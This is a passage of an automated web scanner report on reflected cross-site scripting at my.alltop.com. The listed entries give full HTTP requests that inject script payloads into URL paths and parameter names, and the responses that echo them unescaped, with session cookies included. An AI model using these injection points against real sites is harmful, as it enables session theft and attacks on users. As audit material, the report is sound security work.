Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:35 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f1dffd"><script>alert(1)</script>494432b1804/%22ns=%22netsparker(0x0001AE)" method="post" accept-charset="utf-8">
...[SNIP]...

1.112. http://my.alltop.com/alpha/f/%22ns=%22netsparker(0x0001AE) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f/%22ns=%22netsparker(0x0001AE)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4bc"><script>alert(1)</script>59b63e2909c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f/%22ns6f4bc"><script>alert(1)</script>59b63e2909c=%22netsparker(0x0001AE) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:37 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:37 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:37 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f/%22ns6f4bc"><script>alert(1)</script>59b63e2909c=%22netsparker(0x0001AE)" method="post" accept-charset="utf-8">
...[SNIP]...

1.113. http://my.alltop.com/alpha/f/%22ns=%22netsparker(0x0001AE) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f/%22ns=%22netsparker(0x0001AE)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1575"><script>alert(1)</script>bb87551d7a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f/%22ns=%22netsparker(0x0001AE)?a1575"><script>alert(1)</script>bb87551d7a4=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:33 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:33 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:33 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f/%22ns=%22netsparker(0x0001AE)?a1575"><script>alert(1)</script>bb87551d7a4=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.114. http://my.alltop.com/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83254"><script>alert(1)</script>d65e63750bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f83254"><script>alert(1)</script>d65e63750bd/%2522ns%253D%2522netsparker%25280x0001B2%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:34 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:34 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:34 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f83254"><script>alert(1)</script>d65e63750bd/%2522ns%253D%2522netsparker%25280x0001B2%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.115. http://my.alltop.com/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b02e"><script>alert(1)</script>800b6acde3b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)3b02e"><script>alert(1)</script>800b6acde3b HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:36 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:37 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:37 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)3b02e"><script>alert(1)</script>800b6acde3b" method="post" accept-charset="utf-8">
...[SNIP]...

1.116. http://my.alltop.com/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4016"><script>alert(1)</script>723dd290d3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)?e4016"><script>alert(1)</script>723dd290d3d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)?e4016"><script>alert(1)</script>723dd290d3d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.117. http://my.alltop.com/alpha/g ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g

Issue detail

The value of the '"--></style></script><script>netsparker(0x00019C)</script> request parameter is copied into the HTML document as plain text between tags. The payload eb774<script>alert(1)</script>9cbd873fd63 was submitted in the '"--></style></script><script>netsparker(0x00019C)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g?'"--></style></script><script>netsparker(0x00019C)</script>eb774<script>alert(1)</script>9cbd873fd63 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:26 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:27 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:27 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>eb774<script>alert(1)</script>9cbd873fd63" method="post" accept-charset="utf-8">
...[SNIP]...

1.118. http://my.alltop.com/alpha/g [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64976"><script>alert(1)</script>76975e56a68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g64976"><script>alert(1)</script>76975e56a68 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:02 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:03 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:03 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g64976"><script>alert(1)</script>76975e56a68" method="post" accept-charset="utf-8">
...[SNIP]...

1.119. http://my.alltop.com/alpha/g [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16cef"><script>alert(1)</script>404a76099af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g?16cef"><script>alert(1)</script>404a76099af=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:57 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:59 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:59 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g?16cef"><script>alert(1)</script>404a76099af=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.120. http://my.alltop.com/alpha/g [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67394"><script>alert(1)</script>c90d49d4144 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012C)%3C/script%3E67394"><script>alert(1)</script>c90d49d4144 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:01 GMT
